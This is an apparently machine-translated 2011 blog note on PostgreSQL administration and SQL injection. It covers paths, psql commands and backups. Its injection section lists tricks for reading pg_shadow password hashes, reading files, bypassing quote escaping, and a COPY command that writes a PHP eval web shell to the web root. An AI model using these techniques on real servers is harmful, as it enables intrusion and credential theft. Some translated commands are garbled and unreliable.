Postgresql injection and Management note

Author: LengF PostTime: 2011-08-17

I believe that Mysql and MSSQL are the most common concerns. Of course, Oracle has also received much attention. However, some databases are "rare", such as DB2, Postgresql, Sybase ASE, and Informix. If you do not know the features of these databases, you cannot talk about injection and management. This article is only part of my study notes. I read the official documents and some online documents carefully when I met Postgresql. I have shared these ideas with you. This article only describes postgresql on the Linux platform

1. Postgresql Overview
Postgresq is an RDBMS derived from Berkeley's Postgres project. The early versions were 4.2 and postgresql 95. The new version replaced the query language with SQL (originally PostQUEL ), and added an interactive psql. The test platform is developed on postgresql8.4 + ubuntu 10.04.
Basic information:
(1) general default installation path
/Usr/local/pgsql
/Var/lib/pgsql
/Usr/lib/postgresql/8.4 # This is the default path under my ubuntu
/Usr/syno/pgsql/# default synolog NAS path
If you do not know where to install it, run the following command: (you can also use the find command)
Whereis postgresql
Return Value:

Postgresql:/etc/postgresql/usr/lib/postgresql/usr/share/postgresql

The default path is found to prevent some Linux systems (I encountered) from associating the psql command to user environment variables. This interactive psql is required for management.
The default port is 5432. By default, the network is not enabled. To enable the port, set tcpip_socket to true and set the listen_address parameter. You can use SSL for communication.
(2) Permission issues
Postgresql is not allowed to log on and run as a root user in Linux (for security reasons ). Generally, a user named S is created by default during the installation process, which has a low permission. When talking about permissions, several key terms must be mentioned: frontend (client), postmaster, and backend. The postmaster and backend are different, though they may be implemented using the same program. The front-end first communicates with the postmaster and specifies that he wants to connect to the database. The postmaster will verify whether the access is permitted. Once the front-end passes identity authentication, the postmaster will generate a backend process to hand over the connection. Then the query and result will occur between the frontend and backend. Postmaster is no longer involved.
(3) file directory
Only security-related files are listed here, including the configuration files and the data Directories stored in the database. These directory values are sometimes assigned to the $ PGDATA environment variables, so sometimes you can find the data and configuration file there and try to execute the command:

Echo $ PGDATA

I did not test this environment variable because I have no database and configuration information. Important files are listed below
/Data/pg_hda.conf # records that allow and deny access to data, including authentication methods
/Data/postmaster. conf # postmaster Configuration
/Data/pg_ident.conf # ing information between database users and system users
/Data/PG_VERSION # version information
/Global/pg_database # ing between database names and paths
The default database names are:
"Template1"
"Template0"
"S"
/Global/pg_group # User Group
/Global/pg_pwd # User Name
/Global/pg_shadow # User Password

There are differences in directories in different environments, and you need to find and flexibly adapt to them.
2. Simple Management
First, you cannot manage through the root account. You must switch to a user running postgresql with the highest or lower permissions (of course, there must be a ing relationship). Common users are postgres and admin. Run the following command:

Su-l ipvs

Then execute:

/Usr/lib/postgresql/8.4/bin/psql database | null

If the database is followed by an existing data, the database is managed. If the database name is not the same as the user name. Common commands are as follows:

\ Copyright # version
\ H # Command help, same as help
\? # View psql commands
\ Q # exit the current management

Enter \? View psql help as follows:

\ E [FILE] # use an external editor to edit a buffer FILE or SQL
\ F [FUNCNAME] # function editing
\ P # display Query Buffer
\ R # Clear Query Buffer
\ S [FILE] # display history or save it to a FILE
\ W FILE # Write queries to files
\ Copy... perform SQL COPY with data stream to the client host
\ Echo [STRING] write string to standard output
\ I FILE # execute commands from a FILE
\ O [FILE] # Send all query results to files

Frequently Used commands in databases are as follows:

\ L # list all database names of the current database
\ C database # connect to the database
\ Dt # Show All table names
\ D table name # display table name

I will not go into details about other SQL statements similar to other databases.
3. Export and Import Databases
Export Database:

Pg_dump database>/home/LengF/pgbackup/database. bak # specify database Backup
Pg_dumpall>/home/LengF/pgbackup/all. bak # Back up all databases
Pg_dump database | split-B 500>/home/LengF/pgbackup/database. bak # back up and split the backup file in KB

Import database:

Createdb lengf;
Psql <backup file path;

This is the basic management.
3. Postgresql injection features
[1] The syntax for injecting SQL statements is basically the same as that for other statements.
[2] supports/*,/*/,-annotation, and \ g to indicate that the statement is over and the connection string is used | (similar to + in mssql)
[3] built-in functions: current_database (), session_user, current_user
[4] Do not forget to query pg_user, pg_group, pg_shadow, and the above pg_database
[5] File writing can be the same as other databases, but do you still remember the copy command above?

Copy (select' <? Php eval ($ _ POST [a]);?> ') To'/var/www/lf. php'

[6] The pg_read_file function can still be read. However, this function is generally not recommended.
[7] The common architecture is PHP + Postgresql, so we must consider GPC, but don't be afraid. We can replace the single quotes with $ to bypass it.
Also recommended a SQL Injection finishing: http://www.bkjia.com/Article/201108/100716.html
4. Summary
This article focuses on describing postgresql's security features and focuses on exploitation. You also need to experiment and practice on your own. If you have mastered this database, can you connect to other databases? The end of the nonsense.
Reference:
[1] http://wenku.baidu.com/view/2fc0252c7375a417866f8ffd.html